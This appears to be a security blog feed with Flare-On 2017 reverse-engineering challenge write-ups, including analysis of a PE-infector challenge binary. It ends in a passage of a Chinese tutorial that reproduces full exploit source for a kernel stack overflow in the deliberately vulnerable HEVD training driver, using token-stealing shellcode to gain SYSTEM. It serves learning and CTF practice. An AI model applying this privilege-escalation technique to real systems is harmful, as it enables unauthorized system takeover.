kernel32_GetFileSize = sub_1015310(user32.dll, 0xDF7D9BAD);
kernel32_FlushViewOfFile = sub_1015310(user32.dll, 0xB12C56D7);
kernel32_LoadLibraryA = sub_1015310(user32.dll, 0xEC0E4E8E);
kernel32_GetProcAddress = sub_1015310(user32.dll, 0x7C0DFCAA);
kernel32_GetModuleHandleA = sub_1015310(user32.dll, 0xD3324904);
kernel32_UnmapViewOfFile = sub_1015310(user32.dll, 0xB2089259);
kernel32_ExpandEnvironmentStringsA = sub_1015310(user32.dll, 0xEEB585D8);
kernel32_FileTimeToSystemTime = sub_1015310(user32.dll, 0x3810CB0F);
kernel32_GetTimeFormatA = sub_1015310(user32.dll, 0xF02A93BE);
kernel32_GetDateFormatA = sub_1015310(user32.dll, 0xF72A53BA);
</code></pre></div></div>
<p>At the end of the entry point’s function, we know the program then proceeds to look for files in <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code> that have PE-headers using the <code class="highlighter-rouge">FindFirstFileA</code> / <code class="highlighter-rouge">FindNextFileA</code> API. When it finds an executable file, calling the function at <code class="highlighter-rouge">0x1014E20</code> to infect it. This type malware is called <code class="highlighter-rouge">PE infector</code>.</p>
<p>At <code class="highlighter-rouge">0x1014E20</code> function, it will be find MZ haeder, PE header, compares timestamp value and infector other PE file. About PE executable format, we can using “010 editor” tool’s PE template <a href="https://www.sweetscape.com/010editor/templates/">PETemplate.bt</a> to assist analysis PE timestamp. At <code class="highlighter-rouge">0x10146C0</code>, it compares the compile timestamp value of the PE file that is currently executing against a hard-coded value, then compares the compile timestamp value of the discovered PE against another hard-coded value. This comparison is repeated for several pairs of timestamp values until both are matched. At <code class="highlighter-rouge">0x1014E20</code>, the infection code at <code class="highlighter-rouge">0x101500B</code>, it checks for the value <code class="highlighter-rouge">0x8675309</code> at offset <code class="highlighter-rouge">0x1C</code> in the PE and does not infect it if found. When infecting, it adds this value to that offset of the PE. This is known as an “infection marker” Make sure the execute file is only infected once.</p>
<p>When a successful match is found the second timestamp value is converted to a string and printed in a message box and generate <code class="highlighter-rouge">key.bin</code>. About <code class="highlighter-rouge">key.bin</code>, we can follow <code class="highlighter-rouge">0x10145B0</code> function, where eight bytes from offset <code class="highlighter-rouge">0x0C</code> in the PE is appended to a file named <code class="highlighter-rouge">key.bin</code>. This is first message box pop up.</p>
<p><img src="https://i.imgur.com/R2IiXIW.png" alt="" /></p>
<ul>
<li>Solutions:</li>
</ul>
<p>So far we know that we need some files that meet the requirements (timestamp) in 2016’s FLARE On challenge. After finding it, put those files in the <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code> directory. Next, <code class="highlighter-rouge">notepad.exe</code> will check the timestamp of those files. If it match, the file timestamp value is converted to a string and printed in a message box, and where “eight bytes” from offset <code class="highlighter-rouge">0x0C</code> in the PE is appended to ` Key .bin` file.</p>
<p>In the <code class="highlighter-rouge">0x1014B4B</code> to <code class="highlighter-rouge">0x1014D0A</code> code block, it used to check the timestamp of the file and write <code class="highlighter-rouge">key.bin</code> file, we total need of four files, include the order of file and file timestamp</p>
<table>
<thead>
<tr>
<th>Timestamp of infected file</th>
<th>Timestamp of 2016’s FLARE On challenge</th>
<th>challenge name</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x57D1B2A2</td>
<td>0x48025287</td>
<td>(Challenge1) challenge1.exe</td>
</tr>
<tr>
<td>0x57D2B0F8</td>
<td>0x57d1b2a2</td>
<td>(Challenge2) DudeLocker.exe</td>
</tr>
<tr>
<td>0x49180192</td>
<td>0x57D2B0F8</td>
<td>(Challenge6) khaki.exe</td>
</tr>
<tr>
<td>0x579E9100</td>
<td>0x49180192</td>
<td>(Challenge3) unknow</td>
</tr>
</tbody>
</table>
<p>The final timestamp value comparison is only performed on the running executable. If it matches, 32 bytes are read from the <code class="highlighter-rouge">key.bin</code> file and are XORed against a 32 byte string of unprintable characters stored in a local variable.</p>
<p>Finally, Running the binaries in this order is challenge 1.exe, DudeLocker.exe, khaki.exe, and unknown. We can get the flag in message box.</p>
<p><code class="highlighter-rouge">bl457_fr0m_th3_p457@flare-on.com</code></p>
<hr />
<ul>
<li>Challenge Author: James T. Bennett (@jtbennettjr)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/04_Notepad/notepad.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 3 Greektome.exe
2018-05-22T00:00:00+00:00
http://0x00.tw/2018/05/22/2017 Flare-On #3 Greektome
<p><code class="highlighter-rouge">Greek_to_me.exe</code> is a Windows x86 executable. When we launch the binary, we can’t input anything, and we don’t get any output from the binary. It gets stuck waiting for us to do something.</p>
<ul>
<li>Analysis:</li>
</ul>
<p>When we open it in IDA, we can see it contains the <code class="highlighter-rouge">socket</code> function at <code class="highlighter-rouge">0x401151</code>, the binary using a standard series of Windows API functions: <code class="highlighter-rouge">socket</code>, <code class="highlighter-rouge">bind</code>, <code class="highlighter-rouge">listen</code>, and <code class="highlighter-rouge">accept</code>.</p>
<p>So far we know the binary listening for a TCP connection from localhost on port 2222 (0x8AE). It then proceeds to read up to 8-bit register in <code class="highlighter-rouge">sub_401121</code>, and the input is a 32-bit integer.</p>
<p><img src="https://i.imgur.com/szZCmXr.png" alt="" /></p>
<p>Additionally, there has some interesting string of the program at virtual address <code class="highlighter-rouge">0x401101</code>, that is <code class="highlighter-rouge">Congratulations! But wait, where',27h,'s my flag?</code></p>
<p><img src="https://i.imgur.com/fSeXBij.png" alt="" /></p>
<p>At <code class="highlighter-rouge">0x401036</code>, the first byte from the recv buffer is moved into the lower eight bits of the EDX register. Then, focus on <code class="highlighter-rouge">loc_40107C</code> function and <code class="highlighter-rouge">loc_401039</code> function, the address <code class="highlighter-rouge">0x40107C</code> is moved into the <code class="highlighter-rouge">EAX</code> register, representing the start address for the decoding loop.</p>
<p>The decoding loop contains some operations. First of all, take a one byte at the address stored in <code class="highlighter-rouge">EAX</code> (<code class="highlighter-rouge">0x40107C</code>). Next, XOR the extracted byte with the first byte received over the listening socket, then incremented by 34 (0x22). Use the resulting byte to overwrite the byte extracted in <code class="highlighter-rouge">EAX</code>.</p>
<p><img src="https://i.imgur.com/tx8jK96.png" alt="" /></p>
<p>Further, <code class="highlighter-rouge">sub_4011E6</code> function is used to hash, arguments are the start address of the modified code (<code class="highlighter-rouge">0x40107C</code>) and the length value 121 (0x79). In <code class="highlighter-rouge">sub_4011E6</code> function, a 16 bits (<code class="highlighter-rouge">AX</code>) hash data is calculated and checked against 64350 (0xFB5E) for equality. If the hash data matches, the code is executed, without getting an error message <code class="highlighter-rouge">Nope, that’s not it</code>.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>The key is only a single byte, but there are 256 possibilities. Following python code to help us get <code class="highlighter-rouge">0xA2</code> (<code class="highlighter-rouge">ó</code>) as the key:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="c">#scoket info</span>
<span class="n">HOST</span> <span class="o">=</span> <span class="s">'127.0.0.1'</span>
<span class="n">PORT</span> <span class="o">=</span> <span class="mi">2222</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">):</span>
<span class="c">#open exe</span>
<span class="n">filepath</span> <span class="o">=</span> <span class="s">'greek_to_me.exe'</span>
<span class="n">os</span><span class="o">.</span><span class="n">startfile</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="n">s</span><span class="p">)</span>
<span class="c">#connect socket</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">HOST</span><span class="p">,</span> <span class="n">PORT</span><span class="p">))</span>
<span class="n">s</span><span class="o">.</span><span class="n">sendall</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">))</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">data</span> <span class="o">==</span> <span class="s">"Congratulations! But wait, where's my flag?"</span><span class="p">):</span>
<span class="k">print</span> <span class="n">i</span>
<span class="k">print</span> <span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'Received'</span><span class="p">,</span> <span class="nb">repr</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
</code></pre></div></div>
<p>Put a breakpoints at <code class="highlighter-rouge">0x401063</code> with IDA, we can find the flag that got written to the stack was <code class="highlighter-rouge">et_tu_brute_force@flare-on.com</code></p>
<ul>
<li>Notes:
<ul>
<li>Compared with <code class="highlighter-rouge">127.0.0.1</code> and <code class="highlighter-rouge">0.0.0.0</code>:
<ul>
<li><code class="highlighter-rouge">127.0.0.1</code> is only for local interface, when a server listen <code class="highlighter-rouge">127.0.0.1</code> that means “only communicate within the same host”.</li>
<li>when a server listen on <code class="highlighter-rouge">0.0.0.0</code> that means “listen on every available network interface”.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<ul>
<li>Challenge Author: Matt Williams (@0xmwilliams)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/03_Greek_to_me/greek_to_me.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 2 IgniteMe.exe
2018-05-20T00:00:00+00:00
http://0x00.tw/2018/05/20/2017 Flare-On #2 IgniteMe
<p>This is a crack me challenge. <code class="highlighter-rouge">IgniteMe.exe</code> expects to run without any command line argument. It asks the player to input the flag and checks whether it’s correct or not.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\nnyl\Desktop\flareon4\Challenge2>IgniteMe.exe
G1v3 m3 t3h fl4g: flareon
N0t t00 h0t R we? 7ry 4ga1nz plzzz!
</code></pre></div></div>
<ul>
<li>Analysis:</li>
</ul>
<p><img src="https://i.imgur.com/3rA8jZy.png" alt="" /></p>
<p><code class="highlighter-rouge">sub_4010F0</code> function is used to read user input data,and stored the user input data at <code class="highlighter-rouge">0x403078</code>.</p>
<p>The <code class="highlighter-rouge">sub_401050</code> function is flag validation function, focusing on code block between <code class="highlighter-rouge">0x401088</code> and <code class="highlighter-rouge">0x4010AD</code>, you can see where the input is processed by xor loop, and checks it against some data <code class="highlighter-rouge">enc</code> (at <code class="highlighter-rouge">0x0403000</code>).</p>
<p><img src="https://i.imgur.com/hoqtTCR.png" alt="" /></p>
<p><code class="highlighter-rouge">sub_401000</code> function is used to generate key, we can get an initial seed to be the number 4.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>In the first loop, <code class="highlighter-rouge">IgniteMe.exe</code> XOR’s 0x04 with the last character of user input data. The result is then XOR’d with the second from last char, and it keeps on going. The global variable <code class="highlighter-rouge">byte_403180</code> stores the encoded user input data.</p>
<p>Upon completion of encoded user input data, checks for correctness of the decrypted data (<code class="highlighter-rouge">enc</code>). if it correct print <code class="highlighter-rouge">G00d j0b!</code>.</p>
<p>Therefore, we can bruteforced the <code class="highlighter-rouge">enc</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.data:00403000 ; char enc[]
.data:00403000 enc dd 4549260Dh
.data:00403004 dd 4478172Ah
.data:00403008 dd 5E5D6C2Bh
.data:0040300C dd 172F1245h
.data:00403010 dd 6E6F442Bh
.data:00403014 dd 455F0956h
.data:00403018 dd 0A267347h
.data:0040301C dd 4817130Dh
.data:00403020 dd 4D400142h
.data:00403024 dd 69020Ch
</code></pre></div></div>
<p>The following script obtains the flag.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">enc</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x0D</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x2A</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x78</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0x6C</span><span class="p">,</span> <span class="mh">0x5D</span><span class="p">,</span> <span class="mh">0x5E</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x12</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0x44</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x6E</span><span class="p">,</span> <span class="mh">0x56</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x5F</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0x0A</span><span class="p">,</span> <span class="mh">0x0D</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0x17</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0x42</span><span class="p">,</span> <span class="mh">0x01</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x4D</span><span class="p">,</span> <span class="mh">0x0C</span><span class="p">,</span> <span class="mh">0x02</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">]</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="n">v4</span> <span class="o">=</span> <span class="mi">4</span> <span class="c">#key</span>
<span class="n">ans</span> <span class="o">=</span> <span class="s">''</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">enc</span><span class="p">)):</span>
<span class="n">v4</span> <span class="o">=</span> <span class="n">v4</span> <span class="o">^</span> <span class="n">enc</span><span class="p">[</span><span class="o">-</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">ans</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">v4</span><span class="p">)</span>
<span class="k">print</span> <span class="nb">hex</span><span class="p">(</span><span class="n">enc</span><span class="p">[</span><span class="o">-</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">print</span> <span class="n">ans</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</code></pre></div></div>
<p>Flag: <code class="highlighter-rouge">R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com</code></p>
<hr />
<ul>
<li>Challenge #2 by Nhan Huynh</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/02_IgniteMe/IgniteMe.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 1 login.html
2018-05-10T00:00:00+00:00
http://0x00.tw/2018/05/10/2017 Flare-On #1 Login
<p><a href="http://flare-on.com">Flare-On Challenge</a> is the FireEye Labs Advanced Reverse Engineering (FLARE) team’s yearly reverse engineering contest. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals.</p>
<ul>
<li><a href="https://github.com/0x000050/CTF/tree/master/2017_Flare-On">Challenges download</a></li>
<li>The <a href="https://www.fireeye.com/blog/threat-research/2017/10/2017-flare-on-challenge-solutions.html">solutions</a> written by each challenge author</li>
</ul>
<hr />
<p>login.html</p>
<p>There is an HTML file with a form. We need to provide a flag and check for its correctness.</p>
<p><img src="https://i.imgur.com/BkoCOyn.png" alt="" /></p>
<p>Here is the content of <code class="highlighter-rouge">login.html</code>, the HTML page containing a simple client-side JavaScript authentication using ROT-13.</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><!DOCTYPE Html /></span>
<span class="nt"><html></span>
<span class="nt"><head></span>
<span class="nt"><title></span>FLARE On 2017<span class="nt"></title></span>
<span class="nt"></head></span>
<span class="nt"><body></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"flag"</span> <span class="na">id=</span><span class="s">"flag"</span> <span class="na">value=</span><span class="s">"Enter the flag"</span> <span class="nt">/></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"button"</span> <span class="na">id=</span><span class="s">"prompt"</span> <span class="na">value=</span><span class="s">"Click to check the flag"</span> <span class="nt">/></span>
<span class="nt"><script </span><span class="na">type=</span><span class="s">"text/javascript"</span><span class="nt">></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"prompt"</span><span class="p">).</span><span class="nx">onclick</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">flag</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"flag"</span><span class="p">).</span><span class="nx">value</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">rotFlag</span> <span class="o">=</span> <span class="nx">flag</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">[</span><span class="sr">a-zA-Z</span><span class="se">]</span><span class="sr">/g</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">c</span><span class="p">){</span>
<span class="k">return</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">((</span><span class="nx">c</span> <span class="o"><=</span> <span class="s2">"Z"</span> <span class="p">?</span> <span class="mi">90</span> <span class="p">:</span> <span class="mi">122</span><span class="p">)</span> <span class="o">>=</span> <span class="p">(</span><span class="nx">c</span> <span class="o">=</span> <span class="nx">c</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="mi">13</span><span class="p">)</span> <span class="p">?</span> <span class="nx">c</span> <span class="p">:</span> <span class="nx">c</span> <span class="o">-</span> <span class="mi">26</span><span class="p">);});</span>
<span class="k">if</span> <span class="p">(</span><span class="s2">"PyvragFvqrYbtvafNerRnfl@syner-ba.pbz"</span> <span class="o">==</span> <span class="nx">rotFlag</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Correct flag!"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Incorrect flag, rot again"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nt"></script></span>
<span class="nt"></body></span>
<span class="nt"></html></span>
</code></pre></div></div>
<p>Use python to decode and extract this flag.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">print</span> <span class="s">"PyvragFvqrYbtvafNerRnfl@syner-ba.pbz"</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'rot13'</span><span class="p">)</span>
</code></pre></div></div>
<p>If we enter <code class="highlighter-rouge">PyvragFvqrYbtvafNerRnfl@syner-ba.pbz</code> as the input, the message box shows us the flag for this challenge: <code class="highlighter-rouge">ClientSideLoginsAreEasy@flare-on.com</code>.</p>
<hr />
<ul>
<li>Challenge #1 by Dominik Weber (@Invalid_handle)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/01_Login/login.html">Challenge download</a></li>
</ul>
Windows Kernel Exploit - Stack Overflow
2018-01-10T00:00:00+00:00
http://0x00.tw/2018/01/10/Windows Kernel Exploit - Stack Overflow
<p>本篇以 HEVD 為案例進行實作,HEVD 是由 HackSysTeam 所開發的 Kernel Driver,該專案中包含了許多常見的漏洞,適合想練習 Windows Kernel Exploit 的研究人員練習,藉以用來練習各種漏洞利用方法。本篇以 Windows 7 為範例,本次測試的 Windows 7 沒有 SMEP 與 SMAP 防護機制,相對較簡單,有機會也會在其他版本的 Windows 上練習。</p>
<h3 id="description">Description</h3>
<ul>
<li>本篇會省略工作環境的準備,專注於漏洞利用操作的細節</li>
<li>本篇利用的 Windows Driver 為 <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver">HackSysExtremeVulnerableDriver</a>,選擇這項資源當作示範的原因是有 Source Code 能參考(更容易理解漏洞),相關 solution 可以參考 <a href="https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn">FuzzySecurity 的 PowerShell Kernel Pwn</a></li>
</ul>
<h3 id="environment">Environment</h3>
<ul>
<li>Windows 7 x86 SP1 (Version 6.1.7601)</li>
<li>無 SMEP(supervisor mode execution prevention) 防護機制</li>
<li>無 SMAP(supervisor mode access prevention) 防護機制</li>
</ul>
<h3 id="tools">Tools</h3>
<ul>
<li>VMware Workstation 12</li>
<li>Visual Studio 2017</li>
<li>WinDBG</li>
<li>IDA Pro</li>
<li>osrloaderv30</li>
<li>cmd</li>
</ul>
<h3 id="vulnerability">Vulnerability</h3>
<p>這是一個在 Windows Kernel Driver 的 StackOverflow 漏洞,接下來將了解該漏洞的細節。</p>
<p>通常 Windows Kernel Driver 的研究,會先從負責處理 IOCTL 的函數開始看起,可以透過 <code class="highlighter-rouge">DriverEntry</code> 中的 <code class="highlighter-rouge">DriverObject -> MajorFunction[IRP_MJ_DEVICE_CONTROL]</code> 找到,而在 HackSysTeam Driver 中可以透過 control code <code class="highlighter-rouge">0x222003</code> 來觸發 Stack Overflow</p>
<p><img src="https://i.imgur.com/v26v5uU.png" alt="" /></p>
<p>這裡補充一下 <a href="https://msdn.microsoft.com/zh-tw/library/windows/desktop/aa363216(v=vs.85).aspx">IOCTL</a> 的知識,Windows Kernel Driver 的 IOCTL 是 User Mode 與 Kernel Driver 之間溝通的方式,Kernel 與 User 會透過 IOCTL 來進行資料的傳遞,當 Kernel Driver 在處理從 User Mode 傳過來的資料時,若沒有檢查,可能會有問題。</p>
<pre><code class="language-clike=">BOOL WINAPI DeviceIoControl(
_In_ HANDLE hDevice,
_In_ DWORD dwIoControlCode,
_In_opt_ LPVOID lpInBuffer,
_In_ DWORD nInBufferSize,
_Out_opt_ LPVOID lpOutBuffer,
_In_ DWORD nOutBufferSize,
_Out_opt_ LPDWORD lpBytesReturned,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
</code></pre>
<p>了解 IOCTL 後,回到原來所討論的漏洞,HackSys Team 有提供 <code class="highlighter-rouge">StackOverflow.c</code> 的 <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/StackOverflow.c">Source Code</a> ,不妨看 Source Code 相關部分來理解此漏洞</p>
<pre><code class="language-clike=">NTSTATUS TriggerStackOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {
NTSTATUS Status = STATUS_SUCCESS;
ULONG KernelBuffer[2048] = {0};
PAGED_CODE();
__try {
// Verify if the buffer resides in user mode
ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));
DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));
#ifdef SECURE
// Secure Note: This is secure because the developer is passing a size
// equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
// there will be no overflow
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
//用 sizeof 限制大小
#else
DbgPrint("[+] Triggering Stack Overflow\n");
// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
// because the developer is passing the user supplied size directly to
// RtlCopyMemory()/memcpy() without validating if the size is greater or
// equal to the size of KernelBuffer
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size); //UserBuffer 的大小
#endif
}
__except (EXCEPTION_EXECUTE_HANDLER) {
Status = GetExceptionCode();
DbgPrint("[-] Exception Code: 0x%X\n", Status);
}
return Status;
}
</code></pre>
<p><code class="highlighter-rouge">RtlCopyMemory</code> 就是 <code class="highlighter-rouge">memcpy</code>,常見的問題是沒有檢查 User Mode 傳過來的參數或大小,先看有問題的寫法( Source Code 第 28 行 ),這裡的 <code class="highlighter-rouge">Size</code> 是 UserBuffer 的大小</p>
<pre><code class="language-clike=">RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
</code></pre>
<p>正確的寫法可以用 <code class="highlighter-rouge">sizeof</code> 來限制 memcpy 時,copy 的大小不會超出 <code class="highlighter-rouge">KernelBuffer</code></p>
<pre><code class="language-clike=">RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
</code></pre>
<p>若是沒有檢查,可能會造成 Overflow,蓋到 ret</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-0000081C KernelBuffer db 2048 dup(?)
-0000001C var_1C dd ?
-00000018 ms_exc CPPEH_RECORD ?
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008 UserBuffer dd ? ; offset
+0000000C Size dd ?
+00000010
+00000010 ; end of stack variables
</code></pre></div></div>
<h3 id="exploit">Exploit</h3>
<ul>
<li>首先,在 User Mode 申請一塊具有可讀可寫可執行 (RWX) 權限的記憶體,用來存放 Shellcode</li>
<li>把 token stealing shellcode 放到這塊記憶體中</li>
<li>取得 HacksysExtremeVulnerableDriver device 的 Handle</li>
<li>將 return address 修改為 Userland 中 shellcode 的記憶體位置, 當函數 return 後,shellcode 就會被執行</li>
<li>Shellcode 會去找 system 這隻 process (PID = 4),並取得他的 token</li>
<li>還原 StackFrame,否則會藍屏,因為在 Kernel 中做事</li>
<li>擁有 system token 代表具有 system 的權限,用該權限建立的 cmd.exe 會有 system 的權限</li>
</ul>
<p>HackSys Extreme Vulnerable Driver 的 <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflow.c">Exploit StackOverflow.c</a></p>
<pre><code class="language-clike=">#include "StackOverflow.h"
DWORD WINAPI StackOverflowThread(LPVOID Parameter) {
HANDLE hFile = NULL;
ULONG BytesReturned;
PVOID MemoryAddress = NULL;
PULONG UserModeBuffer = NULL;
LPCSTR FileName = (LPCSTR)DEVICE_NAME;
PVOID EopPayload = &TokenStealingPayloadWin7; //shellcode
SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE) * sizeof(ULONG);
__try {
DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
}
else {
DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
}
// Get the device handle
DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
else {
DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
}
DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");
UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
UserModeBufferSize);
if (!UserModeBuffer) {
DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
else {
DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
}
DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");
RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);
MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - sizeof(ULONG));
*(PULONG)MemoryAddress = (ULONG)EopPayload;
DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);
DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow\n");
OutputDebugString("****************Kernel Mode****************\n");
DeviceIoControl(hFile,
HACKSYS_EVD_IOCTL_STACK_OVERFLOW,
(LPVOID)UserModeBuffer,
(DWORD)UserModeBufferSize,
NULL,
0,
&BytesReturned,
NULL);
OutputDebugString("****************Kernel Mode****************\n");
HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);
UserModeBuffer = NULL;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
return EXIT_SUCCESS;
}
</code></pre>
<h3 id="shellcode">Shellcode</h3>
<ul>
